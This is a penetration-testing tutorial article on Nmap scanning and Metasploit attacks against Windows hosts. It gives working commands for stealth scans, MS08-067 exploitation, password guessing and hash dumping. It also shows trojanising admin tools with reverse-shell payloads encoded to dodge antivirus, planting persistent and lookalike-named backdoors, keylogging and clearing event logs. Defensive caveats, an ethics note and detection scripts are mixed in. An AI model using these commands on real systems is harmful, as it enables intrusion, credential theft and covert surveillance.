Overview
In the hakin9.org February release I wrote about the latest version of Nmap and about how Metasploit can be used to harm your network. The article gives you an idea of what Metasploit can offer, and I would like to share the ins and outs of both tools and how they can benefit any security practitioner. The content of the article follows.
The power of exploitation tools
Since 2011 we have heard about a lot of incidents around the world: confidential information being compromised, government websites being defaced and big corporate networks crippled. The famous example is the Anonymous group, but have you ever wondered what the success factor is? Is this the new era of the modern ninja?
Introduction
Until now we do not hear much in the news about corporate networks being attacked by ninjas; rather we hear the term blackhat. Blackhat practitioners have practices similar to the ancient ninja, although the tools used today are different from the ancient ones. The most common techniques they use are scanning and exploitation. I will cover these two important areas and the types of attacks that use Nmap and Metasploit.
What does a malicious hacker do
Whether blackhat or whitehat, they know what is required to hack a system or to secure one. Below are the four core areas that make up the attack cycle:
- Scanning
- Gaining access
- Maintaining access
- Clearing tracks
NMAP Scanning
Nmap is by far the most popular port scanner. Why is it so popular? Because Nmap provides the following information to an attacker:
- Live hosts on the network. In some cases the security administrator will block ICMP to avoid detection; Nmap can still scan those hosts if you add the -Pn parameter, which skips host discovery and treats every address as up, e.g. nmap -Pn ip_address.
- Target identification such as OS detection (nmap -O ip_address) and service version detection (nmap -sV ip_address).
- Scriptable interaction with the target, e.g. nmap -sT --script=smb-check-vulns -Pn ip_address. This scan reports whether any machine on the network is missing the MS08-067 patch. (-P0 is the older spelling of -Pn, and in current Nmap releases smb-check-vulns has been split into separate smb-vuln-* scripts, such as smb-vuln-ms08-067.)
From the information collected you will have more visibility into what the target machine is, and you can properly plan your attack.
The art of scanning is very important: we always try to gain information about the targets without revealing our presence or intentions. One of the preferred options is a stealth TCP scan against the remote system. As you can see in figure 1, the result of an Nmap scan gives you an idea of what is running on the remote server: the list of open ports, along with a description of the service detected on each.
As shown in figure 1, this type of scan will no longer work unnoticed against the host, because intrusion prevention systems are now deployed across systems for better protection. Although in figure 1 we used -sS (SYN scan) and -A (aggressive mode: OS detection, version detection, script scanning and traceroute together), this is no longer recommended where an IPS sits in the path, since -A generates a lot of noise.
Most of the time, if we need to perform a stealth scan, a command like the following is used:
- nmap -v -Pn -sS -f --mtu 32 --data-length 50 --source-port 99 --randomize-hosts -T1 192.168.238.131
- -sS is a half-open or SYN scan. It does not complete the three-way TCP handshake, so no connection is ever established and the scan has a chance of not being logged by the application or picked up by an IPS. By default the SYN scan probes the 1000 most commonly used TCP ports.
- -f fragments packets. It splits the TCP header over several small IP fragments (8 bytes of payload each) to make it harder for a firewall or IPS to match a signature. Note that many modern firewalls and IDS reassemble fragments before inspection, and some operating systems do not let Nmap send fragments at all.
- --mtu sets a specific fragment size. It is almost the same as -f, except you choose the size, which must be a multiple of 8 (8, 16, 24, 32 and so on). In this example we use 32.
- --data-length appends random data to every probe. This matters because some firewall vendors fingerprint Nmap by its predictable, empty probes. In this example we add 50 bytes to every packet.
- --source-port (or -g) sets the source port, to bypass poorly configured firewalls that trust traffic from certain ports (53 and 20 are typical choices; 99 is used here).
- --randomize-hosts: a typical IDS or IPS signature might fire if you scan multiple target hosts in order. Randomizing the order in which you scan helps avoid this. Consider this option whenever you have a list of IPs to scan.
- -T1 is the timing template. Templates run from -T0 (paranoid, five minutes between probes) to -T5 (insane); -T1 (sneaky) waits 15 seconds between probes and -T2 (polite) 0.4 seconds. At -T1 a full port range (-p1-65535) against even a handful of hosts takes days, so the slow templates are for stealth, not for coverage.
But as you can see, each time you perform information gathering Nmap gives you a lot of information, and it is not practical to keep all of it in flat files. This is where Metasploit comes into the picture to reduce the effort: everything that was scanned is kept in a database rather than in a flat file.
NMAP Integration with database
Once we know what we are looking for, we need to document all our findings in a proper format so that we can easily find the vulnerable machines we plan to exploit. In the previous example we learned how to use the stealth technique when scanning a server; now we need to get the scan output into a usable format. In the past I used a lot of bash shell scripting to post-process Nmap results for this.
Before I go into the easier way, I would like to share the following script. It scans the 10.1.1.0/24 subnet, tries to find the live hosts and filters only the Windows servers (those with NetBIOS port 139 open). The method is messy, as it contains too much code, but if you are good at shell scripting you are in control of the game.
#!/bin/bash
# Ping sweep of 10.1.1.0/24: one probe per host, all in parallel, print the addresses that answer
for i in `seq 1 254`;
do
ping -c 1 10.1.1.$i | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
wait
# Scan the same subnet for NetBIOS (TCP 139) and save grepable output
nmap -p 139 10.1.1.0/24 -oG 139.txt
# Show the hosts with 139 open, then save that list to a file
cat 139.txt | grep open | cut -d" " -f2
cat 139.txt | grep open | cut -d" " -f2 > 139-ips.txt
# Fingerprint the OS of those hosts only
nmap -O -iL 139-ips.txt -oG 139-os.txt
# Print the OS guess for each host (the OS: field of the grepable line)
cat 139-os.txt | grep "OS:" | sed 's/.*OS: //; s/\t.*//'
The other method is much easier: run the same scan and export it into XML format. Use the scan command from above with -oX, giving the output file the .xml extension explicitly, because Nmap does not add one: nmap -sS -Pn -A -oX subnet10.xml 10.1.1.0/24. A file named subnet10.xml will be created.
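The following is an added example of my own, not the article's code and not part of Nmap or Metasploit. It does what the shell script above does, but over the XML output instead of the grepable one: it reads an Nmap -oX file, keeps the hosts that are up, records their open ports and best OS match, and lists the hosts that have SMB (139 or 445) open and look like Windows, which are the candidates for the smb-check-vulns follow-up. The XML embedded in it is a constructed sample in the nmaprun format, not a real scan.

```python
"""Added example: pull hosts, open ports and OS guesses out of an Nmap -oX file.

Not the article's code.  The XML below is a constructed sample in the nmaprun
format (two hosts up, one down), not real scan output.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -Pn -O -oX subnet10.xml 10.1.1.0/24">
  <host><status state="up"/><address addr="10.1.1.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="96"/></os>
  </host>
  <host><status state="up"/><address addr="10.1.1.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.32" accuracy="92"/></os>
  </host>
  <host><status state="down"/><address addr="10.1.1.10" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"open": {port: service}, "os": best osmatch name or None}} for hosts that are up."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # -Pn marks everything up; with host discovery, down hosts have no ports anyway
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                svc = port.find("service")
                open_ports[int(port.get("portid"))] = svc.get("name", "") if svc is not None else ""
        # -O can emit several osmatch entries; keep the one with the highest accuracy
        matches = host.findall("os/osmatch")
        best = max(matches, key=lambda m: int(m.get("accuracy", "0"))).get("name") if matches else None
        hosts[addr.get("addr")] = {"open": open_ports, "os": best}
    return hosts


def windows_smb_hosts(hosts):
    """Hosts worth an smb-check-vulns follow-up: SMB reachable (139 or 445 open) and fingerprinted as Windows."""
    return sorted(ip for ip, h in hosts.items()
                  if (139 in h["open"] or 445 in h["open"])
                  and h["os"] is not None and "Windows" in h["os"])


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_XML)
    for ip, h in parsed.items():
        print(ip, sorted(h["open"]), h["os"])
    print("SMB/Windows candidates:", windows_smb_hosts(parsed))
```

On a real scan, call parse_nmap_xml(open("subnet10.xml").read()); the same file is what db_import reads, so the two views stay in step.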
Storing scan result into Metasploit
Take note that MySQL is no longer supported in Metasploit; you need to use PostgreSQL as the main database. The database is not part of the package and you need to install it manually. The steps are not hard; you can follow the mini steps below.
- Install the server and client: apt-get install postgresql-8.4 postgresql-client-8.4.
- Start the service: /etc/init.d/postgresql-8.4 start.
- Next, disable SSL in the config file: nano /etc/postgresql/8.4/main/postgresql.conf. Find the line that reads ssl = true and comment it out so that it looks like the following (the comment in the file says it: a change here requires a restart):
#ssl = true # (change requires restart)
- Restart the service so the change takes effect: /etc/init.d/postgresql-8.4 restart.
- To set the password of the postgres database user, open a psql session as the postgres account (sudo -u postgres psql), type the ALTER USER statement, quit with \q, and then remove the Unix password of the postgres account:
ALTER USER postgres WITH PASSWORD 'mypassword';
\q
sudo passwd -d postgres
I believe those of you who have been using MySQL will find this just as easy to use.
The next steps are creating the database in Metasploit and loading the Nmap XML into it. What we need to do is start the Metasploit console; the summary is three steps.
- Load Metasploit by typing msfconsole. This is the command that starts the engine.
- db_connect postgres:mypassword@127.0.0.1/mypentest. This connects to (and, if it does not exist yet, creates) a database called mypentest with all the required tables. The format is db_connect username:password@host/databasename.
- db_import subnet10.xml imports the scan you performed earlier into the database (the argument is the file written by -oX); afterwards the hosts and services commands show what is in the database. Take note that an Nmap scan does not tell you what the vulnerabilities are; it gives you the open ports and the operating system fingerprint.
- However, for testing purposes on BackTrack 5, we can do a further check for SMB vulnerabilities with nmap -sT --script=smb-check-vulns -Pn 10.0.0.1 (the older -P0 spelling still works; current Nmap releases use the smb-vuln-ms08-067 script instead). I see this as a pretty awesome command to start testing with. As you know, a lot of organizations have challenges in patch management, and by doing this we can go straight to the areas we would like to exploit. If you run the same Nmap command from inside msfconsole as db_nmap, its results land in the same database.
Motive of the attacker
After we have run through the scanning tools, the second step is finding the systems that we can attack further. The most common weaknesses that insider espionage is likely to use are listed below. You will probably think that the fourth point is a waste of time and that you will never find it on the network, but if you have thousands of servers to check, I believe at least 1% of them will not be properly managed. However, I would like to cover more than just software exploitation. We as administrators have an important part in managing servers, but have you ever thought about whether the tools we use are free from malware? In this article I will also cover how a binary can be re-engineered without breaking the software, which is the trick used to slip past antivirus scanning.
- Un-patched Microsoft Windows Server
- Weak admin password
- SQL Server
- VNC server, which provides graphical access to a remote system, similar to Microsoft's Remote Desktop
- Sending malware to the users
What is Metasploit
The Metasploit Project is an open-source computer security project developed by HD Moore. The tool has improved over the years since its first release in October 2003. Originally there were 11 exploits; at the time of writing (February 2012) the framework contains 798 exploits and 246 payloads. Metasploit comes in free and commercial versions, which are updated on a regular basis. You can always update the software by issuing the msfupdate command to get the latest exploits and test them out.
What can Metasploit really do?
Judging from the name of the tool, you know that its purpose is to exploit a vulnerable system. Before I get started with what we will do with the software, you must know what Metasploit can do. One feature that was good to remove is db_autopwn, which allowed you to launch an automatic attack against every host in the database; it invited unintentional attacks, and it is no longer part of the framework. What I would like to cover next are the five attack vectors that are most commonly used.
Attack vector 1: Un-patched Microsoft Windows Server
Attacking a Windows machine is quite common today, due to the lack of patch management as well as other factors, such as running non-genuine Microsoft products that cannot receive updates. How would the attacker start? Most probably with a common vulnerability such as MS08-067 (the SMB Server service flaw that Conficker exploited). This is not a joke, as some organizations never patch their systems. There are two approaches: the first is simply to guess that they have a vulnerable system, and the second is to use the scanner I explained earlier.
Metasploit is not so hard to use once we know the concept behind it. For each attack we need an exploit and a payload. The exploit is the code that takes advantage of a specific vulnerability on the target in order to run code of our choosing; it is the step that any protective measure on the target (a patch, an IPS, DEP) will stop if one is in place. The payload is the code we want the system to run on successful exploitation so that it interacts with the attacker. To start Metasploit, we run the first command, msfconsole, which displays the screen we use most.
To find the exploit for MS08-067, we can issue the command search ms08-067, which shows where the exploit is located (exploit/windows/smb/ms08_067_netapi). There is a lot of built-in flexibility.
Figure 2: Example configuration for exploiting the vulnerability on Windows XP
As you can see in Figure 2, Metasploit has been configured to use the MS08-067 vulnerability against the target host. The payload we use is Meterpreter, which provides a lot more flexibility in handling the remote system. In the payload options LPORT has been set to 8080, since port 8080 is most likely allowed out as a proxy port; it is even better to set it to a well-known port such as 80 or 443 to avoid detection. If you want to see the list of Meterpreter commands, you can always type help to see all the available options, grouped as follows:
- Core commands
- File system
- Networking
- System
- User interface
- Webcam
- Elevate
- Password database
- Timestomp
As you can see in figure 3, we have obtained the hashes with hashdump. In some cases the admin account will be renamed to hide its role, but each account still has its own SID, and the last component of the SID, the relative identifier (RID), is what tells the accounts apart. RID 500 identifies the built-in Administrator account whatever it has been renamed to.
In this example we collect the information below. Each line has the form username:RID:LM hash:NT hash:::. We extract the first hash, 11cb3f697332ae4cc295285c92cd06b4 (the LM hash, the weaker of the two), and paste it into http://www.onlinehashcrack.com/index.php to find the original password for the exploited machine. Keep in mind that pasting a hash into a third-party site discloses it, and with it the client's password material, to that site; cracking it locally against a wordlist avoids that.
Administrator:500:11cb3f697332ae4cc295285c92cd06b4:4424147a7dcd3c47c4ec3921443023bd:::
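An added example of the local alternative, my code rather than the article's: it parses hashdump lines like the one above, identifies the built-in Administrator by RID 500 whatever the account is called, flags blank passwords and stored LM hashes, and checks a wordlist against the NT hash offline. The NT hash is MD4 over the UTF-16LE password; MD4 is implemented in the block because hashlib's md4 is disabled in many OpenSSL 3 builds. Only the Administrator line is from the article; the other two sample accounts and the wordlist are constructed, and the article's hash does not appear in that wordlist, so it correctly comes back as not cracked.

```python
"""Added example (mine, not the article's): triage a hashdump offline.

Only the Administrator line in SAMPLE_DUMP is from the article; the other
two lines and the wordlist are made up for the example.
"""
import struct

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored (or password is empty)
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """MD4 per RFC 1320: pad, then three rounds of 16 steps per 64-byte block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        v = [a, b, c, d]
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # the RFC's step table walks a, d, c, b
                v[t] = _rotl(v[t] + func(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + x[k] + const,
                             shifts[i % 4])
        a, b, c, d = [(s + w) & 0xFFFFFFFF for s, w in zip((a, b, c, d), v)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4 of the password encoded as UTF-16LE, as hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text):
    """Parse user:RID:LM:NT::: lines into dicts; skips anything not in that shape."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def triage(entries, wordlist):
    """Per account: built-in admin?  blank password?  LM hash stored?  wordlist hit on the NT hash?"""
    by_nt = {nt_hash(w): w for w in wordlist}  # hash the wordlist once, then look every account up
    return {
        e["user"]: {
            "builtin_admin": e["rid"] == 500,
            "blank": e["nt"] == BLANK_NT,
            "lm_stored": e["lm"] != BLANK_LM,  # an LM hash means at most 14 chars, case-folded, easy to crack
            "cracked": by_nt.get(e["nt"]),
        }
        for e in entries
    }


# Constructed sample: the article's Administrator line plus two made-up accounts
SAMPLE_DUMP = """Administrator:500:11cb3f697332ae4cc295285c92cd06b4:4424147a7dcd3c47c4ec3921443023bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
SAMPLE_WORDLIST = ["password", "password1", "Winter2012"]

if __name__ == "__main__":
    for user, result in triage(parse_hashdump(SAMPLE_DUMP), SAMPLE_WORDLIST).items():
        print(user, result)
```

Feed it the output of hashdump and a real wordlist; anything that comes back cracked is a finding in its own right, and the lm_stored flag tells you which accounts still have the far weaker LM hash on disk.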
Attack vector 2: Weak admin password
Checking for weak passwords has become a must-know skill across the security arena. Although there are many commercial scanners on the market that provide this functionality, I would like to show you three options: scripts on Windows and on Linux, and Metasploit as our core tool.
Let's start with the Windows script. You need a credential file, password.txt, with one password and username per line, separated by a space:
Password Username
mypassword administrator
password1 admin
Next, execute the following at the command prompt. Each line is tried as a connection to the IPC$ share of the remote server; the lines that do not fail are the valid passwords (the FOR option is spelled tokens, and a successful connection should be removed afterwards with net use \\remoteserver\ipc$ /delete):
FOR /F "tokens=1,2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /user:%j
Do you see how easily we can build a tool within Windows? But what about Linux scripting? The approach is the same; only the syntax differs. First you need a dictionary file called credential, with one password per line:
password1
password2
Next, open a shell on the Linux box and type the following:
for I in $(cat credential); do smbclient -L remote_ip --user=administrator%$I; done
What the command does is read the credential file line by line into the variable I. For each value it uses smbclient to list the shares of the remote host (-L) as the user administrator, with %$I supplying the password from the credential file; a share listing instead of NT_STATUS_LOGON_FAILURE means the guess was right.
As you have learned so far, there are two approaches, one for Windows and one for Linux scripting. The good news regarding Metasploit is that it has the same functionality. As you can see in figure 4, we have a lot of options for checking weak passwords on the network (for SMB the module is auxiliary/scanner/smb/smb_login). If you want to scan an entire network you can set this on RHOSTS by typing set RHOSTS 192.168.238.1-200. This minimizes your effort in developing new code. One caveat applies to all three methods: every failed attempt counts against the account lockout threshold, so the tool must stay below that threshold per account or it will lock out the very administrators it is testing.
Figure 4: Password auditing tools in metasploit
Attack vector 3: SQL Server
Database servers are always the critical servers handling and processing the business requirements. However, some organizations lack knowledge from the security point of view: instead of security, money is invested in high availability of the server to avoid hardware failure and so on. But high availability of a single database server guarantees nothing if the standard security practices are not in place.
Metasploit has the option of validating whether there are any weak passwords on the network, and the most common module we use is auxiliary/scanner/mssql/mssql_login. Finding the right password is a very important phase before we can go to figure 5; the sa account is the usual target, since it can run operating-system commands through the database server. Once we have the password, we set the configuration as in figure 5 and run the command exploit. If it works we have control of the remote server's operating system.
Attack vector 4: VNC server
This is my favourite attack among the rest, because we are trying our luck to see whether any VNC server on the network is running without a password. As you know, VNC gives you the console: if a user leaves a session unlocked, you see the same unlocked screen on the other host. Metasploit has the option to find any of these systems with no password (auxiliary/scanner/vnc/vnc_none_auth), which can help you manage the risk of being exploited. The first thing you need to do is search for vnc in the Metasploit console; if any are found you will see a list of VNC modules. In this article I chose the option that bypasses VNC authentication; as you can see below, AUTOVNC has been set to true (by default the configuration is false). If we successfully attack a remote server, the VNC screen appears on the attacker's screen. However, there is some risk in using this method: once you are connected, the VNC icon on the remote server turns black, which means that if someone is watching, they will see that someone has connected to the machine.
Attack vector 5: Sending malware to the users
Among all the attacks, attack vector 5 is the scariest, and I will explain why. In your organization you are the system administrator and you use a lot of tools to manage the systems. Those tools come from Microsoft, Sysinternals or other free software providers. Have you ever thought about how valid those files are? Let's take an example: I believe every organization has a file server, and where better to store all the required files than on the file server?
But how do you guarantee that the files you use daily for system administration have not been compromised with malware? When your antivirus scans the files it detects nothing, so you believe they are free of malware. What if I told you that is wrong? We now have the ability to hide the malware from antivirus software. The idea behind this attack is that each time the user launches the software, it automatically connects back to the attacker. From there the attacker can launch different types of attack depending on their motive.
Then again, we use the same payload, windows/meterpreter/reverse_tcp, and set LPORT to 8080 to avoid detection. What we need to do is encode our binary with shikata_ga_nai. The first step is to download any software that is commonly used by the users, such as PuTTY, Excel Viewer or similar, and copy the file to /opt/framework/msf3/work.
From here we encode the binary by issuing the following command (as one line):
msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=8080 R | msfencode -t exe -x /opt/framework/msf3/work/myfiles.exe -k -o /root/Desktop/back.exe -e x86/shikata_ga_nai -c 5
Here -x uses the downloaded program as the template and -k keeps the template working by running the payload in a new thread, so the user still gets the tool they expect; without -k the binary only launches the payload, which gives the trick away. We use five rounds of encoding, shown as -c 5. The more iterations, the better the chances of sneaking past antivirus, although shikata_ga_nai's decoder stub is itself well known to antivirus engines, so this does not hold against current products. In current Metasploit releases msfpayload and msfencode have been replaced by a single tool, and the equivalent is msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=8080 -x myfiles.exe -k -e x86/shikata_ga_nai -i 5 -f exe -o back.exe. When this stage is finished, we have completed the task of creating the binary.
On the attacker's side, they run the handler (msfcli needs the trailing E to execute the module; in current releases use exploit/multi/handler from msfconsole with the same PAYLOAD, LHOST and LPORT):
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.238.133 LPORT=8080 E
Next we need someone to run the file, and from there we can launch the attack. The scary part is: what if your IT support team were using these infected files, with no way of telling whether the files are infected with malware or not?
Maintaining access by planting backdoor
Once we have exploited the machine and have access to the server, this may be only temporary access; we might want to revisit the system to get more information from it.
Install as service
Windows might be rebooted for some reason, such as maintenance or a crash, so you would probably like to create a backdoor as a service, so that next time you do not need to perform the same exploit all over again: what you need to do is just wait for the client to power up the machine again. The persistence script can only be run once you have exploited the machine, and this is where you install it as a service: -S installs it as a service that starts at boot, -i is the interval in seconds between connection attempts, -p the port and -r the attacker's address. I always prefer port 443 or 80, as these are common ports.
meterpreter > run persistence -S -i 7 -p 443 -r 192.168.238.133
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20120211.1431/WINXP-1_20120211.1431.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.238.133 LPORT=443
[*] Persistent agent script is 609615 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\herNEE.vbs
[*] Executing script C:\WINDOWS\TEMP\herNEE.vbs
[+] Agent executed with PID 2952
[*] Installing as service..
[*] Creating service hDFbkpZQqoTkBx
Once the system is rebooted, you can connect back to the host using the multi/handler module. This only works on Windows machines with weak antivirus management, since the VBS agent dropped into the TEMP directory is widely detected, but for the sake of a proof of concept you can try this out to learn how the entire framework works. Note the resource file in the output above: it is the cleanup script that removes the service, the registry entry and the VBS file. Run it from a Meterpreter session on that host with resource /root/.msf4/logs/persistence/WINXP-1_20120211.1431/WINXP-1_20120211.1431.rc at the end of the engagement, because a persistent agent left behind is a backdoor for anyone who finds it.
Capturing keyboard strokes
Some attackers, when they have exploited a machine, do not intend to disrupt the availability of the system; their interest is in stealing information, and one of the ways to do it is dumping all keystrokes. Before that they must know which process corresponds to which function. In most attacks the attacker will target two main processes: winlogon.exe and explorer.exe.
The reason for targeting explorer.exe is simple: they want to know what the user is typing on the screen. For example, if the user is doing a bank transaction in a web browser, those keystrokes will be captured. Winlogon.exe, on the other hand, is targeted to capture the user's password as it is typed at the logon screen (migrating into it requires SYSTEM privileges). There are other methods too, such as getting the LM hash and cracking it. In this type of attack you just need to know five commands:
- ps: lists all the running processes on the Windows machine. If you want to target winlogon.exe or explorer.exe, look up its PID here.
- migrate: once you have the PID, type this to migrate into that process (e.g. migrate 776).
- getpid: if you switch between PIDs, sometimes you want to check which process you are currently in. We do not use it much.
- keyscan_start: this is the most interesting part, where we start the keylogger.
- keyscan_dump: once the keylogger is started, type this to see whether any new keystrokes have been recorded.
Creating an automatic backdoor
Creating a backdoor is always a challenge, as antivirus is updated with the latest detections to make sure those files are not installed on the machines. My favourite is to create an exe with a name that is almost the same as one in the operating system. For example, for svchost.exe you can create a new backdoor named svch0st.exe. If you look carefully, both names are almost the same; only the "o" has been replaced with "0".
The first step is to create the file with the following command, which is meant to ensure that antivirus does not detect it as a backdoor. For LPORT I use 443, to make the callback look like the user browsing the internet (the caveat about shikata_ga_nai from attack vector 5 applies here too):
msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=443 R | msfencode -t exe -x /opt/framework/msf3/work/svchost.exe -o /root/Desktop/svch0st.exe -e x86/shikata_ga_nai -c 5
The next step is uploading the backdoor to system32 from the Meterpreter session, which needs enough privileges on the host to write there:
upload /root/Desktop/svch0st.exe c:\\windows\\system32\\
Before you make any further modification to the registry, look at the names of the startup entries already in the registry and plan for a better name. The syntax is as follows:
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Once you have decided on the name, use the following command to create the startup entry. Each time the machine reboots and a user logs on, the entry starts automatically and the victim connects back to you on port 443. In the example below I use the name WindowsValidationService rather than backdoor. Note that a Run value is an autostart entry and not a Windows service: HKLM\Run needs administrative rights and fires for every user's logon, while HKCU\Run needs no elevation and fires only for that user.
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsValidationService -d c:\\windows\\system32\\svch0st.exe
Once all this is set up, the next thing you need to do is set up the multi/handler and wait for them to connect back to you, as I explained in attack vector 5.
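Both the persistence script above and the svch0st.exe trick leave an autostart entry behind, so here is the check a defender would run on the other side. It is an added example of mine, not the article's code: given Run-key values as name and data pairs (the output of reg enumkey and reg queryval, or an export from a live host), it flags image names that are one character off a legitimate Windows binary, images in user-writable locations, script hosts launching a script from such a location, and value names that look randomly generated. The entries in it are constructed; the two suspicious ones are modeled on the article's examples, and the list of legitimate names is a starting point you would extend for your own estate.

```python
"""Added example (not from the article): triage Run-key autostart entries.

SAMPLE_RUN_VALUES is constructed; two entries are modeled on the article's
svch0st.exe backdoor and persistence-script output.
"""
import ntpath

# Windows image names that lookalike backdoors impersonate (assumption: extend for your environment)
LEGIT_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe",
               "services.exe", "spoolsv.exe", "wininit.exe", "taskhost.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}
WRITABLE_HINTS = ("\\temp\\", "\\users\\", "\\documents and settings\\", "\\appdata\\", "\\programdata\\")

SAMPLE_RUN_VALUES = [
    ("VMware User Process", r"C:\Program Files\VMware\VMware Tools\VMwareUser.exe"),
    ("ctfmon", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("WindowsValidationService", r"c:\windows\system32\svch0st.exe"),
    ("hDFbkpZQqoTkBx", r"C:\WINDOWS\system32\wscript.exe //B //NoLogo C:\WINDOWS\TEMP\herNEE.vbs"),
]


def edit_distance_one(a, b):
    """True if a and b differ by exactly one substitution, insertion or deletion (case-insensitive)."""
    a, b = a.lower(), b.lower()
    if a == b:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    if abs(len(a) - len(b)) != 1:
        return False
    longer, shorter = (a, b) if len(a) > len(b) else (b, a)
    return any(longer[:i] + longer[i + 1:] == shorter for i in range(len(longer)))


def looks_random(name):
    """Heuristic: long alphanumeric value name whose case flips at more than 40% of letter boundaries."""
    if len(name) < 8 or not name.isalnum():
        return False
    flips = sum(1 for x, y in zip(name, name[1:])
                if x.isalpha() and y.isalpha() and x.isupper() != y.isupper())
    return flips / (len(name) - 1) > 0.4


def image_and_args(data):
    """Split value data into the executable path and its arguments (handles quoted and unquoted paths)."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end], data[end + 1:].strip()
    head, _, tail = data.partition(" ")
    if head.lower().endswith(".exe") or " " not in data:
        return head, tail
    return data, ""  # unquoted path containing spaces and no arguments


def triage_run_value(name, data):
    """Return the reasons this autostart entry deserves a look; an empty list means nothing obvious."""
    image, args = image_and_args(data)
    basename = ntpath.basename(image).lower()
    reasons = []
    lookalikes = sorted(n for n in LEGIT_NAMES if edit_distance_one(basename, n))
    if lookalikes:
        reasons.append("image name %s is one character off %s" % (basename, lookalikes[0]))
    if any(h in image.lower() for h in WRITABLE_HINTS):
        reasons.append("image lives in a user-writable path")
    if basename in SCRIPT_HOSTS and any(h in args.lower() for h in WRITABLE_HINTS):
        reasons.append("%s launches a script from a user-writable path" % basename)
    if looks_random(name):
        reasons.append("value name looks randomly generated")
    return reasons


def suspicious_entries(values):
    """Map value name -> reasons, for the entries that have any."""
    flagged = {}
    for name, data in values:
        reasons = triage_run_value(name, data)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in suspicious_entries(SAMPLE_RUN_VALUES).items():
        print(name, "->", "; ".join(reasons))
```

The same checks apply to HKCU\Run, the RunOnce keys and the ImagePath of services, which is where the -S option of the persistence script puts its entry.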
As you can see, you have the ability to manipulate registry settings. If you want to attack Yahoo Messenger, for instance, you can even download the entire registry subtree HKEY_CURRENT_USER\Software\Yahoo\Pager and import it on your own PC. This is also one of the ways of stealing an identity.
Clear your tracks
This is the last phase of the attack; of course you do not want people to catch you for all the damage you have done. The most important part is deleting the logs. The last step is the simplest: just type a single Meterpreter command, clearev, which clears the Application, System and Security event logs on the host. For defenders, note that clearing the Security log itself writes an "audit log was cleared" event (ID 1102, or 517 on Windows XP and 2003) before the log is emptied, and that logs already forwarded to a central collector are out of the attacker's reach, so the clearing is itself a signal to alert on.
Note on ethics
Our intention when we started writing these articles was to give an overview of the tools that exist on the market and how we can use them to secure our organization against unidentified threats. When you start to use the tools above, please make sure you keep this in mind:
- Don't use this for any malicious intention.
- Don't attack any organization without approval from top management.
- Think of the damage that you might cause.
Conclusion
